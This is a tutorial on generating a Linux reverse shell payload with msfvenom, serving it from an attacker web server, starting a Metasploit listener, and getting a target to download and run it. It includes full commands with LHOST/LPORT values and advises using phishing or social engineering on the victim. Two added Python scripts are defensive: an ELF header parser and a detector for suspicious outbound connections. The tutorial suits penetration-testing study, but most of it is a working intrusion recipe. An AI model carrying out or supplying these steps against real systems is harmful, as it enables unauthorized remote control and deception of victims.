How to Create and Use a Reverse Shell Using Metasploit

Introduction

Before we begin talking about how to create and use a reverse shell using Metasploit, let's briefly cover what Metasploit is.

Metasploit is a powerful penetration testing tool used to identify vulnerabilities in computer systems. Developed by Rapid7, it allows cybersecurity professionals to exploit these weaknesses, helping organizations improve their security defenses. Its user-friendly interface and extensive features make it a popular choice for researchers and ethical hackers.

A reverse shell is a technique commonly used in cybersecurity and ethical hacking. It involves establishing a connection from a target device back to the attacker's machine, essentially giving the attacker control over the target's command-line interface. This method allows the attacker to execute commands and control various aspects of the compromised device remotely.

When Should You Use a Reverse Shell?

When your target machine sits behind a firewall, a reverse shell is usually the most practical option. Most firewalls permit connections that originate from inside the network, even though they block unsolicited inbound connections; a reverse shell rides on that outbound allowance.

In the second scenario, you find that the target system exposes no listening service you could reach with a bind shell, and you are not sure which shell or payload to use for the exploitation.

How to Construct a Shell Payload in Reverse

Metasploit ships with MSFvenom, a tool that can produce a wide variety of payloads. MSFvenom combines the roles of the older Msfpayload (payload generation) and Msfencode (payload encoding) under a single command.

To build a payload with MSFvenom, you must set at least the -p (payload) and -f (output format) parameters. Use the following command to list every reverse payload:

msfvenom -l all | grep reverse


Target payloads for MSFvenom are diverse and include operating systems (Windows, Linux, OSX, Solaris, BSD), mobile devices (Android & Apple), and numerous language-based applications (PHP, Python, R, Ruby, Java, and CMD).

Common Reverse Shell for Windows

windows/meterpreter/reverse_tcp is the most commonly used Windows reverse shell payload. Because HTTP-based payloads produce network activity that looks more like ordinary web traffic, you can also use windows/meterpreter/reverse_http or windows/meterpreter/reverse_https.

Common Reverse Shell for Linux

Payloads like linux/x86/meterpreter/reverse_tcp or its 64-bit equivalent can be tested on Linux machines. Of them all, linux/x86/shell_reverse_tcp has proven to be the most stable.

In this lesson we will show you how to exploit a Linux system. Our target here is the Metasploitable2 system. Linux is a very common server-side operating system, so gaining experience in attacking Linux systems will help you become more proficient at taking on larger targets.

Make a Linux System-Targeting Reverse Shell Payload

In this case, our payload is saved on our web server, which runs on Kali Linux and serves files from /var/www/html. First, start the web server service with the following command:

sudo service apache2 start

Next, set the permissions so that our payload file can be written to the web server directory. (A practitioner's note: 777 is a lab shortcut; outside a throwaway lab, grant write access only to the user that copies the file, since a world-writable document root lets any local account plant content the server will happily serve.)

sudo chmod 777 /var/www/html -R

Next, the payload is made. To construct a reverse shell payload that targets the Linux system, run the following command:

sudo msfvenom -a x86 --platform=linux -p linux/x86/shell/reverse_tcp LHOST=192.168.69.4 LPORT=6969 -e x86/shikata_ga_nai -f elf > /var/www/html/rev_shell.elf
  • -a: The target architecture (x86 or x64)
  • --platform: The target platform (Linux, Windows, mobile device, etc.)
  • -p: The payload (followed by the LHOST and LPORT to connect back to)
  • LHOST: Our Kali Linux machine's IP address
  • LPORT: Our Kali Linux machine's port, on which the listener service waits
  • -e: The encoder type
  • -f: The output format

Recall that the parameters -p (payload) and -f (output format) are required. You can leave the other options off and let MSFvenom derive the defaults from the payload. Note, however, that a reverse shell payload needs the LHOST and LPORT values, because they define the connect-back point the target will contact.

In case you're wondering, an .elf file is essentially an executable file on Linux systems, similar to an .exe file on Windows. Prefixing the file name with ./ (dot slash) runs an .elf file exactly the way any other executable is called on Linux.
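Since the tutorial turns on what an .elf file is, here is a small ELF header parser, added as an example and not part of the original page. It reads the fields the ELF specification defines in the file header (magic, class, byte order, type, machine, entry point, program and section header counts), which is what a defender does first when triaging an unknown binary pulled off a web server or a host. The sample header bytes are constructed inline for the demonstration; they describe a minimal 32-bit x86 executable of the shape a hand-built loader has, and do not come from any real file.

```python
import struct

# Constants from the ELF specification (e_ident indices and well-known field values).
ELF_MAGIC = b"\x7fELF"
ELFCLASS32, ELFCLASS64 = 1, 2
ELFDATA2LSB, ELFDATA2MSB = 1, 2
E_TYPE = {1: "ET_REL (relocatable)", 2: "ET_EXEC (executable)",
          3: "ET_DYN (shared object / PIE)", 4: "ET_CORE (core dump)"}
E_MACHINE = {3: "x86 (i386)", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def parse_elf_header(data: bytes) -> dict:
    """Decode the ELF file header from the first 52 (ELF32) or 64 (ELF64) bytes.

    Raises ValueError for anything that is not a well-formed ELF header.
    """
    if len(data) < 16 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file (bad magic)")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (ELFCLASS32, ELFCLASS64) or ei_data not in (ELFDATA2LSB, ELFDATA2MSB):
        raise ValueError("unsupported ELF class or data encoding")
    endian = "<" if ei_data == ELFDATA2LSB else ">"
    # Field order after e_ident: e_type, e_machine, e_version, e_entry, e_phoff, e_shoff,
    # e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx.
    if ei_class == ELFCLASS32:
        fmt, header_len = endian + "HHIIIIIHHHHHH", 52   # 32-bit addresses/offsets
    else:
        fmt, header_len = endian + "HHIQQQIHHHHHH", 64   # 64-bit addresses/offsets
    if len(data) < header_len:
        raise ValueError("truncated ELF header")
    (e_type, e_machine, _ver, e_entry, _phoff, _shoff, _flags, _ehsize,
     _phentsize, e_phnum, _shentsize, e_shnum, _shstrndx) = struct.unpack(fmt, data[16:header_len])
    return {
        "bits": 32 if ei_class == ELFCLASS32 else 64,
        "endian": "little" if ei_data == ELFDATA2LSB else "big",
        "type": E_TYPE.get(e_type, f"unknown ({e_type})"),
        "machine": E_MACHINE.get(e_machine, f"unknown ({e_machine})"),
        "entry": e_entry,
        "program_headers": e_phnum,
        "section_headers": e_shnum,
    }


def triage_notes(info: dict) -> list:
    """Cheap structural observations a defender records before deeper analysis."""
    notes = []
    if info["section_headers"] == 0:
        # Compiler output carries a section-header table; minimal hand-built loaders usually omit it.
        notes.append("no section-header table: typical of minimal hand-built loaders")
    if info["program_headers"] <= 1:
        notes.append("single program header: whole image is one loadable segment")
    return notes


def inspect_file(path: str) -> dict:
    """Read just enough of a file on disk to run parse_elf_header on it."""
    with open(path, "rb") as fh:
        return parse_elf_header(fh.read(64))


# Constructed sample: a minimal little-endian ELF32 header for an x86 ET_EXEC image with one
# program header at offset 52 and no section headers. Not taken from any real binary.
SAMPLE_ELF32 = (
    ELF_MAGIC + bytes([ELFCLASS32, ELFDATA2LSB, 1, 0]) + b"\x00" * 8
    + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x08048054, 52, 0, 0, 52, 32, 1, 0, 0, 0)
)

if __name__ == "__main__":
    info = parse_elf_header(SAMPLE_ELF32)
    for key, value in info.items():
        print(f"{key:16} {value:#x}" if key == "entry" else f"{key:16} {value}")
    for note in triage_notes(info):
        print("note:", note)
```

The parser deliberately stops at the file header; program headers, which say what is mapped where and with which permissions, are the next thing to read, and this code is the foundation for that.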

How to Use a Reverse Shell

At this stage we have generated a payload file. Before transferring it to the target, we first need to set up a listener on our Kali Linux machine, so that when the target runs the file we are ready to accept the connection and establish the session.

Step 1: On the attacker's machine, set up a listener (attacker side)

Open the Metasploit Framework console by entering the following command in the terminal:

msfconsole

Select the multi/handler module (exploit/multi/handler) and set the payload to the same one we used when generating the file, linux/x86/shell/reverse_tcp.

Setting the required options is the final configuration step. Run the following command to list the module's options:

show options

Adjust the payload options to match the payload we generated earlier: set LPORT to 6969 and LHOST to the IP address of our Kali Linux machine (the same address we passed to MSFvenom as LHOST).

After the exploit configuration is complete, simply type the following to launch the listener in the background:

run -j

At this point, Metasploit is waiting for an incoming reverse shell connection on port 6969.

Step 2: Payload delivery to the target (target side)

Our payload file now has to be run on the target. It is your responsibility to persuade the victim to download and execute the payload, for example with a phishing website, a social engineering attack, or a combination of the two.

In our example, both the attacker (us) and the target are connected to the same local network. The attacker has placed the payload file on their web server, so the target only needs to download it, because the target can reach the attacker's web server.

Recall that during payload creation we generated a file called rev_shell.elf and placed it in /var/www/html/, the web server's document root. A request to <the attacker IP>/rev_shell.elf is enough to view or download the file. The target may use any web browser, or the following form of the wget command:

wget 192.168.69.4/rev_shell.elf

Step 3: Convince the Target to Run the Payload (Target Side)

Our attacker machine is prepared and waiting for a connection, and the target has already downloaded the payload file. Persuading the target to execute it is your last task: the target must first make the file executable and then run it in the background.

Persuade the target to run the following command, which makes the payload file executable:

chmod +x rev_shell.elf

Next, use the following command to instruct the target to launch the payload file:

./rev_shell.elf &

The trailing & tells the terminal to run the payload in the background, so the target cannot stop it simply by interrupting the foreground command.

Once the target has executed the payload, look at the Metasploit console. You should see that an inbound connection has arrived; if it succeeded, Metasploit reports that a new session has been opened.

Simply type sessions to see a list of all available sessions.

To interact with a particular session, you must call the shell with that session's ID. In our scenario there is only one target, with ID 1. Use the following command to interact with the reverse shell:

sessions -i 1

You now have a reverse shell. It behaves exactly like a Linux terminal on the target. Congratulations! You have taken control of the target system.
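The walkthrough above relies on the point made in the firewall section: outbound connections are usually allowed, so a process like ./rev_shell.elf can reach 192.168.69.4:6969 unhindered. The flip side is that this exact traffic is easy to spot from the host. The following script, added here as an example and not part of the original tutorial, scans `ss -tnp` style output for established connections that this host initiated (ephemeral local port) to a port outside an egress allowlist, and additionally flags processes whose executable lives in a user-writable directory, which is where a downloaded payload ends up. The ss lines and the pid-to-executable table (the latter standing in for reads of /proc/<pid>/exe) are constructed for the demonstration; the allowlist and path prefixes are assumptions a real deployment would tune.

```python
import re
from dataclasses import dataclass

# Constructed sample of `ss -tnp` output on a Linux host, for illustration only.
# Line 2 models the tutorial's payload: rev_shell.elf connected back to 192.168.69.4:6969.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port    Peer Address:Port    Process
ESTAB  0      0      192.168.69.10:22      192.168.69.50:50122  users:(("sshd",pid=812,fd=4))
ESTAB  0      0      192.168.69.10:41234   192.168.69.4:6969    users:(("rev_shell.elf",pid=2231,fd=3))
ESTAB  0      0      192.168.69.10:53318   93.184.216.34:443    users:(("curl",pid=2240,fd=5))
"""

# Constructed pid -> executable path table, standing in for readlink on /proc/<pid>/exe.
SAMPLE_EXE_PATHS = {812: "/usr/sbin/sshd", 2231: "/home/msfadmin/rev_shell.elf", 2240: "/usr/bin/curl"}

# Assumed egress policy: destination ports this host is expected to talk to.
EGRESS_ALLOWLIST = {22, 53, 80, 443}
# Assumed list of locations an interactive user can write to without privileges.
USER_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
# Linux's default ephemeral port range starts at 32768; a local port in it means this host dialled out.
EPHEMERAL_PORT_START = 32768

SS_LINE = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+'
    r'(?P<laddr>\S+):(?P<lport>\d+)\s+'
    r'(?P<raddr>\S+):(?P<rport>\d+)\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+),fd=\d+\)\)'
)


@dataclass
class Finding:
    pid: int
    process: str
    peer: str
    reasons: list


def find_suspicious_connections(ss_output: str, exe_paths: dict,
                                allowlist=EGRESS_ALLOWLIST) -> list:
    """Return one Finding per established outbound connection that breaks a heuristic."""
    findings = []
    for line in ss_output.splitlines():
        m = SS_LINE.match(line)
        if not m or m["state"] != "ESTAB":
            continue  # header line, or a socket that is not an established TCP connection
        lport, rport, pid = int(m["lport"]), int(m["rport"]), int(m["pid"])
        if lport < EPHEMERAL_PORT_START:
            continue  # a server socket accepting an inbound client; not egress from this host
        reasons = []
        if rport not in allowlist:
            reasons.append(f"outbound to non-allowlisted port {rport}")
        exe = exe_paths.get(pid, "")
        if exe.startswith(USER_WRITABLE_PREFIXES):
            reasons.append(f"executable in user-writable location {exe}")
        if reasons:
            findings.append(Finding(pid, m["proc"], f"{m['raddr']}:{rport}", reasons))
    return findings


if __name__ == "__main__":
    for f in find_suspicious_connections(SAMPLE_SS_OUTPUT, SAMPLE_EXE_PATHS):
        print(f"pid {f.pid} ({f.process}) -> {f.peer}")
        for reason in f.reasons:
            print("   -", reason)
```

On the constructed sample the sshd line is skipped because the host is the server side (local port 22), curl to 443 passes both checks, and rev_shell.elf is reported twice over: an unusual destination port and a binary running from a home directory. In practice the same two signals feed an egress firewall rule set and an EDR rule respectively; the script only shows that the evidence the tutorial leaves behind is visible without any special tooling.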

FAQs to Create and Use a Reverse Shell Using Metasploit

What is a reverse shell?

A reverse shell is a technique that establishes a connection from a target machine to an attacker's machine, allowing the attacker to gain control of the target's command-line interface remotely.

How can I create a reverse shell using Metasploit?

Metasploit provides various payloads that can be used to create a reverse shell. By selecting and configuring the appropriate payload, you can generate the code needed to establish the reverse connection.

Which operating systems does Metasploit support for creating reverse shells?

Metasploit supports multiple operating systems, including Windows, Linux, and macOS, which allows you to create reverse shells on various platforms.

Is creating a reverse shell legal?

Creating a reverse shell for educational and ethical purposes, such as penetration testing with proper authorization, is legal. However, using a reverse shell without permission or for malicious activities is illegal.

What precautions should I take when using a reverse shell?

Always ensure that you have proper authorization before using a reverse shell and only use it on systems you are allowed to access. Additionally, take steps to secure your connection, such as using encryption and multi-factor authentication, to prevent unauthorized access to the reverse shell.

Are there any alternatives to Metasploit for creating reverse shells?

While Metasploit is a popular tool for creating reverse shells, there are alternative frameworks and tools available, such as Netcat, PowerShell, or custom scripts, that can also be used to achieve similar results.

How does a firewall affect the use of a reverse shell?

Firewalls can block incoming and outgoing connections, which can hinder the functionality of a reverse shell. To bypass firewalls, attackers often use techniques like tunneling or encoding the communication traffic.

Conclusion

We hope this tutorial helped you understand how to create and use a reverse shell using Metasploit.

If you have any queries, please leave a comment below, and we’ll be happy to respond to them for sure.